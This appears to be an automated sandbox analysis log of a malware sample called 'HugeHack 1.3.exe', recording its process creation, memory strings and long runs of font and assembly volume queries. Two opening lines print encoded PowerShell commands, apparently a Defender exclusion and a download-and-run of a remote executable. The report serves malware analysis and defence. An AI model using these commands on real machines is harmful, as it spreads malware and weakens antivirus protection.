Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc cgblagcaiabhagqazaagaciasablaewatqbcafmatwbgafqavwbbafiarqbcafaabwbsagkaywbpaguacwbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwagaeqazqbmaguabgbkaguacgbcaeuaeabjagwadqbzagkabwbuahmaxabqageadaboahmaigagac8adgagaemaogbcaa==	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc jab1ahiabaagad0aiaaiaggadab0ahaacwa6ac8alwbnagkadaboahuaygauagmabwbtac8aqqbuag8abgbbag0amaazadyaoqavageabqavahiayqb3ac8acgblagyacwavaggazqbhagqacwavag0ayqbpag4alwbsahuabgb0agkabqblaeiacgbvagsazqbyac4azqb4aguaiganaaoajabvahuadabwahuadaagad0aiaaiacqazqbuahyaogbuaguabqbwac8augb1ag4adabpag0azqbcahiabwbraguacgauaguaeablaciadqakaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbsacaalqbpahuadabgagkabablacaajabvahuadabwahuadaanaaoauwb0ageacgb0ac0auabyag8aywblahmacwagac0argbpagwazqbqageadaboacaajabvahuadabwahuadaa=	Jump to behavior

Source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, Payload.exe, 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, Payload.exe, 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, Payload.exe, 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, Payload.exe, 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Progman
Source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, Payload.exe, 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, Payload.exe, 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd+set CDAudio door open/set CDAudio door closed

Contains functionality to query CPU information (cpuid)

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Code function: 5_2_022C03C0 cpuid

5_2_022C03C0

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\webhook.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
